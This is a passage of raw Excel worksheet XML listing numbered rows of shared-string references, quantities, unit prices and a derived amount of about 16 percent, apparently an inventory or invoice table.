      </c>
      <c r="H1513" s="10">
        <v>3</v>
      </c>
      <c r="I1513" s="14">
        <v>408</v>
      </c>
      <c r="J1513" s="15">
        <v>65.28</v>
      </c>
      <c r="K1513" s="16"/>
    </row>
    <row r="1514" spans="2:11">
      <c r="B1514" s="9">
        <v>1548</v>
      </c>
      <c r="C1514" s="238" t="s">
        <v>8841</v>
      </c>
      <c r="D1514" s="238" t="s">
        <v>8842</v>
      </c>
      <c r="E1514" s="238" t="s">
        <v>3854</v>
      </c>
      <c r="F1514" s="238" t="s">
        <v>8843</v>
      </c>
      <c r="G1514" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1514" s="10">
        <v>1</v>
      </c>
      <c r="I1514" s="14">
        <v>648.7</v>
      </c>
      <c r="J1514" s="15">
        <v>103.792</v>
      </c>
      <c r="K1514" s="16"/>
    </row>
    <row r="1515" spans="2:11">
      <c r="B1515" s="9">
        <v>1549</v>
      </c>
      <c r="C1515" s="238" t="s">
        <v>8844</v>
      </c>
      <c r="D1515" s="238" t="s">
        <v>8845</v>
      </c>
      <c r="E1515" s="238" t="s">
        <v>8615</v>
      </c>
      <c r="F1515" s="238" t="s">
        <v>8846</v>
      </c>
      <c r="G1515" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1515" s="10">
        <v>12</v>
      </c>
      <c r="I1515" s="14">
        <v>220.8</v>
      </c>
      <c r="J1515" s="15">
        <v>35.328</v>
      </c>
      <c r="K1515" s="16"/>
    </row>
    <row r="1516" spans="2:11">
      <c r="B1516" s="9">
        <v>1550</v>
      </c>
      <c r="C1516" s="238" t="s">
        <v>8847</v>
      </c>
      <c r="D1516" s="238" t="s">
        <v>8848</v>
      </c>
      <c r="E1516" s="238" t="s">
        <v>8849</v>
      </c>
      <c r="F1516" s="238" t="s">
        <v>8850</v>
      </c>
      <c r="G1516" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1516" s="10">
        <v>3</v>
      </c>
      <c r="I1516" s="14">
        <v>1357.2</v>
      </c>
      <c r="J1516" s="15">
        <v>217.152</v>
      </c>
      <c r="K1516" s="16"/>
    </row>
    <row r="1517" spans="2:11">
      <c r="B1517" s="9">
        <v>1551</v>
      </c>
      <c r="C1517" s="238" t="s">
        <v>8851</v>
      </c>
      <c r="D1517" s="238" t="s">
        <v>8852</v>
      </c>
      <c r="E1517" s="238" t="s">
        <v>8853</v>
      </c>
      <c r="F1517" s="238" t="s">
        <v>8854</v>
      </c>
      <c r="G1517" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1517" s="10">
        <v>1</v>
      </c>
      <c r="I1517" s="14">
        <v>1300</v>
      </c>
      <c r="J1517" s="15">
        <v>208</v>
      </c>
      <c r="K1517" s="16"/>
    </row>
    <row r="1518" spans="2:11">
      <c r="B1518" s="9">
        <v>1552</v>
      </c>
      <c r="C1518" s="238" t="s">
        <v>8855</v>
      </c>
      <c r="D1518" s="238" t="s">
        <v>8856</v>
      </c>
      <c r="E1518" s="238" t="s">
        <v>2011</v>
      </c>
      <c r="F1518" s="238" t="s">
        <v>8857</v>
      </c>
      <c r="G1518" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1518" s="10">
        <v>1</v>
      </c>
      <c r="I1518" s="14">
        <v>104</v>
      </c>
      <c r="J1518" s="15">
        <v>16.64</v>
      </c>
      <c r="K1518" s="16"/>
    </row>
    <row r="1519" spans="2:11">
      <c r="B1519" s="9">
        <v>1553</v>
      </c>
      <c r="C1519" s="238" t="s">
        <v>8858</v>
      </c>
      <c r="D1519" s="238" t="s">
        <v>8859</v>
      </c>
      <c r="E1519" s="238" t="s">
        <v>8860</v>
      </c>
      <c r="F1519" s="238" t="s">
        <v>8861</v>
      </c>
      <c r="G1519" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1519" s="10">
        <v>1</v>
      </c>
      <c r="I1519" s="14">
        <v>38.8</v>
      </c>
      <c r="J1519" s="15">
        <v>6.208</v>
      </c>
      <c r="K1519" s="16"/>
    </row>
    <row r="1520" spans="2:11">
      <c r="B1520" s="9">
        <v>1554</v>
      </c>
      <c r="C1520" s="238" t="s">
        <v>8862</v>
      </c>
      <c r="D1520" s="238" t="s">
        <v>8863</v>
      </c>
      <c r="E1520" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1520" s="238" t="s">
        <v>8864</v>
      </c>
      <c r="G1520" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1520" s="10">
        <v>6</v>
      </c>
      <c r="I1520" s="14">
        <v>96</v>
      </c>
      <c r="J1520" s="15">
        <v>15.36</v>
      </c>
      <c r="K1520" s="16"/>
    </row>
    <row r="1521" spans="2:11">
      <c r="B1521" s="9">
        <v>1555</v>
      </c>
      <c r="C1521" s="238" t="s">
        <v>8865</v>
      </c>
      <c r="D1521" s="238" t="s">
        <v>8866</v>
      </c>
      <c r="E1521" s="238" t="s">
        <v>8867</v>
      </c>
      <c r="F1521" s="238" t="s">
        <v>8868</v>
      </c>
      <c r="G1521" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1521" s="10">
        <v>2</v>
      </c>
      <c r="I1521" s="14">
        <v>48</v>
      </c>
      <c r="J1521" s="15">
        <v>7.68</v>
      </c>
      <c r="K1521" s="16"/>
    </row>
    <row r="1522" spans="2:11">
      <c r="B1522" s="9">
        <v>1556</v>
      </c>
      <c r="C1522" s="238" t="s">
        <v>8869</v>
      </c>
      <c r="D1522" s="238" t="s">
        <v>8870</v>
      </c>
      <c r="E1522" s="238" t="s">
        <v>8147</v>
      </c>
      <c r="F1522" s="238" t="s">
        <v>8871</v>
      </c>
      <c r="G1522" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1522" s="10">
        <v>6</v>
      </c>
      <c r="I1522" s="14">
        <v>88.81</v>
      </c>
      <c r="J1522" s="15">
        <v>14.208</v>
      </c>
      <c r="K1522" s="16"/>
    </row>
    <row r="1523" spans="2:11">
      <c r="B1523" s="9">
        <v>1557</v>
      </c>
      <c r="C1523" s="238" t="s">
        <v>8872</v>
      </c>
      <c r="D1523" s="238" t="s">
        <v>8873</v>
      </c>
      <c r="E1523" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1523" s="238" t="s">
        <v>8874</v>
      </c>
      <c r="G1523" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1523" s="10">
        <v>6</v>
      </c>
      <c r="I1523" s="14">
        <v>56</v>
      </c>
      <c r="J1523" s="15">
        <v>8.9568</v>
      </c>
      <c r="K1523" s="16"/>
    </row>
    <row r="1524" spans="2:11">
      <c r="B1524" s="9">
        <v>1558</v>
      </c>
      <c r="C1524" s="238" t="s">
        <v>8875</v>
      </c>
      <c r="D1524" s="238" t="s">
        <v>8876</v>
      </c>
      <c r="E1524" s="238" t="s">
        <v>8877</v>
      </c>
      <c r="F1524" s="238" t="s">
        <v>8878</v>
      </c>
      <c r="G1524" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1524" s="10">
        <v>3</v>
      </c>
      <c r="I1524" s="14">
        <v>4358.97</v>
      </c>
      <c r="J1524" s="15">
        <v>697.4352</v>
      </c>
      <c r="K1524" s="16"/>
    </row>
    <row r="1525" spans="2:11">
      <c r="B1525" s="9">
        <v>1559</v>
      </c>
      <c r="C1525" s="238" t="s">
        <v>8879</v>
      </c>
      <c r="D1525" s="238" t="s">
        <v>8880</v>
      </c>
      <c r="E1525" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1525" s="238" t="s">
        <v>8881</v>
      </c>
      <c r="G1525" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1525" s="10">
        <v>1</v>
      </c>
      <c r="I1525" s="14">
        <v>1880.34</v>
      </c>
      <c r="J1525" s="15">
        <v>300.8544</v>
      </c>
      <c r="K1525" s="16"/>
    </row>
    <row r="1526" spans="2:11">
      <c r="B1526" s="9">
        <v>1560</v>
      </c>
      <c r="C1526" s="238" t="s">
        <v>8882</v>
      </c>
      <c r="D1526" s="238" t="s">
        <v>8883</v>
      </c>
      <c r="E1526" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1526" s="238" t="s">
        <v>8881</v>
      </c>
      <c r="G1526" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1526" s="10">
        <v>3</v>
      </c>
      <c r="I1526" s="14">
        <v>675.74</v>
      </c>
      <c r="J1526" s="15">
        <v>108.12</v>
      </c>
      <c r="K1526" s="16"/>
    </row>
    <row r="1527" spans="2:11">
      <c r="B1527" s="9">
        <v>1561</v>
      </c>
      <c r="C1527" s="238" t="s">
        <v>8884</v>
      </c>
      <c r="D1527" s="238" t="s">
        <v>8885</v>
      </c>
      <c r="E1527" s="238" t="s">
        <v>8886</v>
      </c>
      <c r="F1527" s="238" t="s">
        <v>8881</v>
      </c>
      <c r="G1527" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1527" s="10">
        <v>2</v>
      </c>
      <c r="I1527" s="14">
        <v>892.3</v>
      </c>
      <c r="J1527" s="15">
        <v>142.768</v>
      </c>
      <c r="K1527" s="16"/>
    </row>
    <row r="1528" spans="2:11">
      <c r="B1528" s="9">
        <v>1562</v>
      </c>
      <c r="C1528" s="238" t="s">
        <v>8887</v>
      </c>
      <c r="D1528" s="238" t="s">
        <v>8888</v>
      </c>
      <c r="E1528" s="238" t="s">
        <v>5005</v>
      </c>
      <c r="F1528" s="238" t="s">
        <v>8881</v>
      </c>
      <c r="G1528" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1528" s="10">
        <v>4</v>
      </c>
      <c r="I1528" s="14">
        <v>927.81</v>
      </c>
      <c r="J1528" s="15">
        <v>148.448</v>
      </c>
      <c r="K1528" s="16"/>
    </row>
    <row r="1529" spans="2:11">
      <c r="B1529" s="9">
        <v>1563</v>
      </c>
      <c r="C1529" s="238" t="s">
        <v>8889</v>
      </c>
      <c r="D1529" s="238" t="s">
        <v>8890</v>
      </c>
      <c r="E1529" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F1529" s="238" t="s">
        <v>8881</v>
      </c>
      <c r="G1529" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1529" s="10">
        <v>1</v>
      </c>
      <c r="I1529" s="14">
        <v>940.17</v>
      </c>
      <c r="J1529" s="15">
        <v>150.4272</v>
      </c>
      <c r="K1529" s="16"/>
    </row>
    <row r="1530" spans="2:11">
      <c r="B1530" s="9">
        <v>1564</v>
      </c>
      <c r="C1530" s="238" t="s">
        <v>8891</v>
      </c>
      <c r="D1530" s="238" t="s">
        <v>8892</v>
      </c>
      <c r="E1530" s="238" t="s">
        <v>8893</v>
      </c>
      <c r="F1530" s="238" t="s">
        <v>8894</v>
      </c>
      <c r="G1530" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1530" s="10">
        <v>40</v>
      </c>
      <c r="I1530" s="14">
        <v>818.05</v>
      </c>
      <c r="J1530" s="15">
        <v>130.88</v>
      </c>
      <c r="K1530" s="16"/>
    </row>
    <row r="1531" spans="2:11">
      <c r="B1531" s="9">
        <v>1565</v>
      </c>
      <c r="C1531" s="238" t="s">
        <v>8895</v>
      </c>
      <c r="D1531" s="238" t="s">
        <v>8896</v>
      </c>
      <c r="E1531" s="238" t="s">
        <v>8897</v>
      </c>
      <c r="F1531" s="238" t="s">
        <v>8881</v>
      </c>
      <c r="G1531" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1531" s="10">
        <v>3</v>
      </c>
      <c r="I1531" s="14">
        <v>185.18</v>
      </c>
      <c r="J1531" s="15">
        <v>29.6304</v>
      </c>
      <c r="K1531" s="16"/>
    </row>
    <row r="1532" spans="2:11">
      <c r="B1532" s="9">
        <v>1566</v>
      </c>
      <c r="C1532" s="238" t="s">
        <v>8898</v>
      </c>
      <c r="D1532" s="238" t="s">
        <v>8899</v>
      </c>
      <c r="E1532" s="238" t="s">
        <v>4974</v>
      </c>
      <c r="F1532" s="238" t="s">
        <v>510</v>
      </c>
      <c r="G1532" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1532" s="10">
        <v>2</v>
      </c>
      <c r="I1532" s="14">
        <v>152.99</v>
      </c>
      <c r="J1532" s="15">
        <v>24.48</v>
      </c>
      <c r="K1532" s="16"/>
    </row>
    <row r="1533" spans="2:11">
      <c r="B1533" s="9">
        <v>1567</v>
      </c>
      <c r="C1533" s="238" t="s">
        <v>8900</v>
      </c>
      <c r="D1533" s="238" t="s">
        <v>8901</v>
      </c>
      <c r="E1533" s="238" t="s">
        <v>8902</v>
      </c>
      <c r="F1533" s="238" t="s">
        <v>8881</v>
      </c>
      <c r="G1533" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1533" s="10">
        <v>2</v>
      </c>
      <c r="I1533" s="14">
        <v>2350.85</v>
      </c>
      <c r="J1533" s="15">
        <v>376.1376</v>
      </c>
      <c r="K1533" s="16"/>
    </row>
    <row r="1534" spans="2:11">
      <c r="B1534" s="9">
        <v>1568</v>
      </c>
      <c r="C1534" s="238" t="s">
        <v>8903</v>
      </c>
      <c r="D1534" s="238" t="s">
        <v>8904</v>
      </c>
      <c r="E1534" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1534" s="238" t="s">
        <v>373</v>
      </c>
      <c r="G1534" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1534" s="10">
        <v>5</v>
      </c>
      <c r="I1534" s="14">
        <v>6257.39</v>
      </c>
      <c r="J1534" s="15">
        <v>1001.184</v>
      </c>
      <c r="K1534" s="16"/>
    </row>
    <row r="1535" spans="2:11">
      <c r="B1535" s="9">
        <v>1569</v>
      </c>
      <c r="C1535" s="238" t="s">
        <v>8905</v>
      </c>
      <c r="D1535" s="238" t="s">
        <v>8906</v>
      </c>
      <c r="E1535" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1535" s="238" t="s">
        <v>8907</v>
      </c>
      <c r="G1535" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1535" s="10">
        <v>2</v>
      </c>
      <c r="I1535" s="14">
        <v>649.57</v>
      </c>
      <c r="J1535" s="15">
        <v>103.9328</v>
      </c>
      <c r="K1535" s="16"/>
    </row>
    <row r="1536" spans="2:11">
      <c r="B1536" s="9">
        <v>1570</v>
      </c>
      <c r="C1536" s="238" t="s">
        <v>8908</v>
      </c>
      <c r="D1536" s="238" t="s">
        <v>8909</v>
      </c>
      <c r="E1536" s="238" t="s">
        <v>5242</v>
      </c>
      <c r="F1536" s="238" t="s">
        <v>316</v>
      </c>
      <c r="G1536" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1536" s="10">
        <v>2</v>
      </c>
      <c r="I1536" s="14">
        <v>1105.42</v>
      </c>
      <c r="J1536" s="15">
        <v>176.8672</v>
      </c>
      <c r="K1536" s="16"/>
    </row>
    <row r="1537" spans="2:11">
      <c r="B1537" s="9">
        <v>1571</v>
      </c>
      <c r="C1537" s="238" t="s">
        <v>8910</v>
      </c>
      <c r="D1537" s="238" t="s">
        <v>8911</v>
      </c>
      <c r="E1537" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1537" s="238" t="s">
        <v>8907</v>
      </c>
      <c r="G1537" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1537" s="10">
        <v>5</v>
      </c>
      <c r="I1537" s="14">
        <v>2222.22</v>
      </c>
      <c r="J1537" s="15">
        <v>355.552</v>
      </c>
      <c r="K1537" s="16"/>
    </row>
    <row r="1538" spans="2:11">
      <c r="B1538" s="9">
        <v>1572</v>
      </c>
      <c r="C1538" s="238" t="s">
        <v>8912</v>
      </c>
      <c r="D1538" s="238" t="s">
        <v>8913</v>
      </c>
      <c r="E1538" s="238" t="s">
        <v>8914</v>
      </c>
      <c r="F1538" s="238" t="s">
        <v>373</v>
      </c>
      <c r="G1538" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1538" s="10">
        <v>10</v>
      </c>
      <c r="I1538" s="14">
        <v>2591.45</v>
      </c>
      <c r="J1538" s="15">
        <v>414.64</v>
      </c>
      <c r="K1538" s="16"/>
    </row>
    <row r="1539" spans="2:11">
      <c r="B1539" s="9">
        <v>1573</v>
      </c>
      <c r="C1539" s="238" t="s">
        <v>8915</v>
      </c>
      <c r="D1539" s="238" t="s">
        <v>8916</v>
      </c>
      <c r="E1539" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1539" s="238" t="s">
        <v>8917</v>
      </c>
      <c r="G1539" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1539" s="10">
        <v>8</v>
      </c>
      <c r="I1539" s="14">
        <v>1037.2</v>
      </c>
      <c r="J1539" s="15">
        <v>165.952</v>
      </c>
      <c r="K1539" s="16"/>
    </row>
    <row r="1540" spans="2:11">
      <c r="B1540" s="9">
        <v>1574</v>
      </c>
      <c r="C1540" s="238" t="s">
        <v>8918</v>
      </c>
      <c r="D1540" s="238" t="s">
        <v>8919</v>
      </c>
      <c r="E1540" s="238" t="s">
        <v>4997</v>
      </c>
      <c r="F1540" s="238" t="s">
        <v>8917</v>
      </c>
      <c r="G1540" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1540" s="10">
        <v>1</v>
      </c>
      <c r="I1540" s="14">
        <v>8492.31</v>
      </c>
      <c r="J1540" s="15">
        <v>1358.7696</v>
      </c>
      <c r="K1540" s="16"/>
    </row>
    <row r="1541" spans="2:11">
      <c r="B1541" s="9">
        <v>1575</v>
      </c>
      <c r="C1541" s="238" t="s">
        <v>8920</v>
      </c>
      <c r="D1541" s="238" t="s">
        <v>8921</v>
      </c>
      <c r="E1541" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F1541" s="238" t="s">
        <v>8917</v>
      </c>
      <c r="G1541" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1541" s="10">
        <v>3</v>
      </c>
      <c r="I1541" s="14">
        <v>6299.27</v>
      </c>
      <c r="J1541" s="15">
        <v>1007.8848</v>
      </c>
      <c r="K1541" s="16"/>
    </row>
    <row r="1542" spans="2:11">
      <c r="B1542" s="9">
        <v>1576</v>
      </c>
      <c r="C1542" s="238" t="s">
        <v>8922</v>
      </c>
      <c r="D1542" s="238" t="s">
        <v>8923</v>
      </c>
      <c r="E1542" s="238" t="s">
        <v>8924</v>
      </c>
      <c r="F1542" s="238" t="s">
        <v>8917</v>
      </c>
      <c r="G1542" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1542" s="10">
        <v>1</v>
      </c>
      <c r="I1542" s="14">
        <v>3372.65</v>
      </c>
      <c r="J1542" s="15">
        <v>539.624</v>
      </c>
      <c r="K1542" s="16"/>
    </row>
    <row r="1543" spans="2:11">
      <c r="B1543" s="9">
        <v>1577</v>
      </c>
      <c r="C1543" s="238" t="s">
        <v>8925</v>
      </c>
      <c r="D1543" s="238" t="s">
        <v>8926</v>
      </c>
      <c r="E1543" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1543" s="238" t="s">
        <v>8917</v>
      </c>
      <c r="G1543" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1543" s="10">
        <v>2</v>
      </c>
      <c r="I1543" s="14">
        <v>1450.43</v>
      </c>
      <c r="J1543" s="15">
        <v>232.0704</v>
      </c>
      <c r="K1543" s="16"/>
    </row>
    <row r="1544" spans="2:11">
      <c r="B1544" s="9">
        <v>1578</v>
      </c>
      <c r="C1544" s="238" t="s">
        <v>8927</v>
      </c>
      <c r="D1544" s="238" t="s">
        <v>8928</v>
      </c>
      <c r="E1544" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1544" s="238" t="s">
        <v>8917</v>
      </c>
      <c r="G1544" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1544" s="10">
        <v>3</v>
      </c>
      <c r="I1544" s="14">
        <v>923.07</v>
      </c>
      <c r="J1544" s="15">
        <v>369.228</v>
      </c>
      <c r="K1544" s="16"/>
    </row>
    <row r="1545" spans="2:11">
      <c r="B1545" s="9">
        <v>1579</v>
      </c>
      <c r="C1545" s="238" t="s">
        <v>8929</v>
      </c>
      <c r="D1545" s="238" t="s">
        <v>8930</v>
      </c>
      <c r="E1545" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1545" s="238" t="s">
        <v>8917</v>
      </c>
      <c r="G1545" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1545" s="10">
        <v>1</v>
      </c>
      <c r="I1545" s="14">
        <v>7158.12</v>
      </c>
      <c r="J1545" s="15">
        <v>1145.2992</v>
      </c>
      <c r="K1545" s="16"/>
    </row>
    <row r="1546" spans="2:11">
      <c r="B1546" s="9">
        <v>1580</v>
      </c>
      <c r="C1546" s="238" t="s">
        <v>8931</v>
      </c>
      <c r="D1546" s="238" t="s">
        <v>8932</v>
      </c>
      <c r="E1546" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1546" s="238" t="s">
        <v>269</v>
      </c>
      <c r="G1546" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1546" s="10">
        <v>1</v>
      </c>
      <c r="I1546" s="14">
        <v>3418.8</v>
      </c>
      <c r="J1546" s="15">
        <v>547.008</v>
      </c>
      <c r="K1546" s="16"/>
    </row>
    <row r="1547" spans="2:11">
      <c r="B1547" s="9">
        <v>1581</v>
      </c>
      <c r="C1547" s="238" t="s">
        <v>8933</v>
      </c>
      <c r="D1547" s="238" t="s">
        <v>8934</v>
      </c>
      <c r="E1547" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1547" s="238" t="s">
        <v>269</v>
      </c>
      <c r="G1547" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1547" s="10">
        <v>1</v>
      </c>
      <c r="I1547" s="14">
        <v>5470.09</v>
      </c>
      <c r="J1547" s="15">
        <v>875.2144</v>
      </c>
      <c r="K1547" s="16"/>
    </row>
    <row r="1548" spans="2:11">
      <c r="B1548" s="9">
        <v>1582</v>
      </c>
      <c r="C1548" s="238" t="s">
        <v>8935</v>
      </c>
      <c r="D1548" s="238" t="s">
        <v>8936</v>
      </c>
      <c r="E1548" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1548" s="238" t="s">
        <v>8937</v>
      </c>
      <c r="G1548" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1548" s="10">
        <v>5</v>
      </c>
      <c r="I1548" s="14">
        <v>2905.98</v>
      </c>
      <c r="J1548" s="15">
        <v>464.96</v>
      </c>
      <c r="K1548" s="16"/>
    </row>
    <row r="1549" spans="2:11">
      <c r="B1549" s="9">
        <v>1583</v>
      </c>
      <c r="C1549" s="238" t="s">
        <v>8938</v>
      </c>
      <c r="D1549" s="238" t="s">
        <v>8939</v>
      </c>
      <c r="E1549" s="238" t="s">
        <v>4997</v>
      </c>
      <c r="F1549" s="238" t="s">
        <v>269</v>
      </c>
      <c r="G1549" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1549" s="10">
        <v>1</v>
      </c>
      <c r="I1549" s="14">
        <v>4641.03</v>
      </c>
      <c r="J1549" s="15">
        <v>742.5648</v>
      </c>
      <c r="K1549" s="16"/>
    </row>
    <row r="1550" spans="2:11">
      <c r="B1550" s="9">
        <v>1584</v>
      </c>
      <c r="C1550" s="238" t="s">
        <v>8940</v>
      </c>
      <c r="D1550" s="238" t="s">
        <v>4947</v>
      </c>
      <c r="E1550" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F1550" s="238" t="s">
        <v>8941</v>
      </c>
      <c r="G1550" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1550" s="10">
        <v>2</v>
      </c>
      <c r="I1550" s="14">
        <v>230.77</v>
      </c>
      <c r="J1550" s="15">
        <v>36.9248</v>
      </c>
      <c r="K1550" s="16"/>
    </row>
    <row r="1551" spans="2:11">
      <c r="B1551" s="9">
        <v>1585</v>
      </c>
      <c r="C1551" s="238" t="s">
        <v>8942</v>
      </c>
      <c r="D1551" s="238" t="s">
        <v>8943</v>
      </c>
      <c r="E1551" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1551" s="238" t="s">
        <v>8944</v>
      </c>
      <c r="G1551" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1551" s="10">
        <v>1</v>
      </c>
      <c r="I1551" s="14">
        <v>4706.56</v>
      </c>
      <c r="J1551" s="15">
        <v>753.0496</v>
      </c>
      <c r="K1551" s="16"/>
    </row>
    <row r="1552" spans="2:11">
      <c r="B1552" s="9">
        <v>1586</v>
      </c>
      <c r="C1552" s="238" t="s">
        <v>8945</v>
      </c>
      <c r="D1552" s="238" t="s">
        <v>8946</v>
      </c>
      <c r="E1552" s="238" t="s">
        <v>8947</v>
      </c>
      <c r="F1552" s="9"/>
      <c r="G1552" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1552" s="10">
        <v>2</v>
      </c>
      <c r="I1552" s="14">
        <v>3076.92</v>
      </c>
      <c r="J1552" s="15">
        <v>492.3072</v>
      </c>
      <c r="K1552" s="16"/>
    </row>
    <row r="1553" spans="2:11">
      <c r="B1553" s="9">
        <v>1587</v>
      </c>
      <c r="C1553" s="238" t="s">
        <v>8948</v>
      </c>
      <c r="D1553" s="238" t="s">
        <v>8949</v>
      </c>
      <c r="E1553" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1553" s="238" t="s">
        <v>8950</v>
      </c>
      <c r="G1553" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1553" s="10">
        <v>2</v>
      </c>
      <c r="I1553" s="14">
        <v>8205.13</v>
      </c>
      <c r="J1553" s="15">
        <v>1312.8224</v>
      </c>
      <c r="K1553" s="16"/>
    </row>
    <row r="1554" spans="2:11">
      <c r="B1554" s="9">
        <v>1588</v>
      </c>
      <c r="C1554" s="238" t="s">
        <v>8951</v>
      </c>
      <c r="D1554" s="238" t="s">
        <v>8952</v>
      </c>
      <c r="E1554" s="238" t="s">
        <v>8953</v>
      </c>
      <c r="F1554" s="238" t="s">
        <v>8950</v>
      </c>
      <c r="G1554" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1554" s="10">
        <v>1</v>
      </c>
      <c r="I1554" s="14">
        <v>222.22</v>
      </c>
      <c r="J1554" s="15">
        <v>35.5552</v>
      </c>
      <c r="K1554" s="16"/>
    </row>
    <row r="1555" spans="2:11">
      <c r="B1555" s="9">
        <v>1589</v>
      </c>
      <c r="C1555" s="238" t="s">
        <v>8954</v>
      </c>
      <c r="D1555" s="238" t="s">
        <v>8955</v>
      </c>
      <c r="E1555" s="238" t="s">
        <v>8956</v>
      </c>
      <c r="F1555" s="9"/>
      <c r="G1555" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1555" s="10">
        <v>2</v>
      </c>
      <c r="I1555" s="14">
        <v>2461.54</v>
      </c>
      <c r="J1555" s="15">
        <v>393.8464</v>
      </c>
      <c r="K1555" s="16"/>
    </row>
    <row r="1556" spans="2:11">
      <c r="B1556" s="9">
        <v>1590</v>
      </c>
      <c r="C1556" s="238" t="s">
        <v>8957</v>
      </c>
      <c r="D1556" s="238" t="s">
        <v>8958</v>
      </c>
      <c r="E1556" s="238" t="s">
        <v>5043</v>
      </c>
      <c r="F1556" s="9"/>
      <c r="G1556" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1556" s="10">
        <v>1</v>
      </c>
      <c r="I1556" s="14">
        <v>222.22</v>
      </c>
      <c r="J1556" s="15">
        <v>35.5552</v>
      </c>
      <c r="K1556" s="16"/>
    </row>
    <row r="1557" spans="2:11">
      <c r="B1557" s="9">
        <v>1591</v>
      </c>
      <c r="C1557" s="238" t="s">
        <v>8959</v>
      </c>
      <c r="D1557" s="238" t="s">
        <v>8960</v>
      </c>
      <c r="E1557" s="238" t="s">
        <v>8961</v>
      </c>
      <c r="F1557" s="9"/>
      <c r="G1557" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1557" s="10">
        <v>8</v>
      </c>
      <c r="I1557" s="14">
        <v>85.47</v>
      </c>
      <c r="J1557" s="15">
        <v>13.6704</v>
      </c>
      <c r="K1557" s="16"/>
    </row>
    <row r="1558" spans="2:11">
      <c r="B1558" s="9">
        <v>1592</v>
      </c>
      <c r="C1558" s="238" t="s">
        <v>8962</v>
      </c>
      <c r="D1558" s="238" t="s">
        <v>8963</v>
      </c>
      <c r="E1558" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1558" s="238" t="s">
        <v>456</v>
      </c>
      <c r="G1558" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1558" s="10">
        <v>6</v>
      </c>
      <c r="I1558" s="14">
        <v>6032.79</v>
      </c>
      <c r="J1558" s="15">
        <v>965.2512</v>
      </c>
      <c r="K1558" s="16"/>
    </row>
    <row r="1559" spans="2:11">
      <c r="B1559" s="9">
        <v>1593</v>
      </c>
      <c r="C1559" s="238" t="s">
        <v>8964</v>
      </c>
      <c r="D1559" s="238" t="s">
        <v>8965</v>
      </c>
      <c r="E1559" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F1559" s="238" t="s">
        <v>456</v>
      </c>
      <c r="G1559" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1559" s="10">
        <v>1</v>
      </c>
      <c r="I1559" s="14">
        <v>2342.31</v>
      </c>
      <c r="J1559" s="15">
        <v>374.7696</v>
      </c>
      <c r="K1559" s="16"/>
    </row>
    <row r="1560" spans="2:11">
      <c r="B1560" s="9">
        <v>1594</v>
      </c>
      <c r="C1560" s="238" t="s">
        <v>8966</v>
      </c>
      <c r="D1560" s="238" t="s">
        <v>8967</v>
      </c>
      <c r="E1560" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1560" s="238" t="s">
        <v>456</v>
      </c>
      <c r="G1560" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1560" s="10">
        <v>2</v>
      </c>
      <c r="I1560" s="14">
        <v>14700.87</v>
      </c>
      <c r="J1560" s="15">
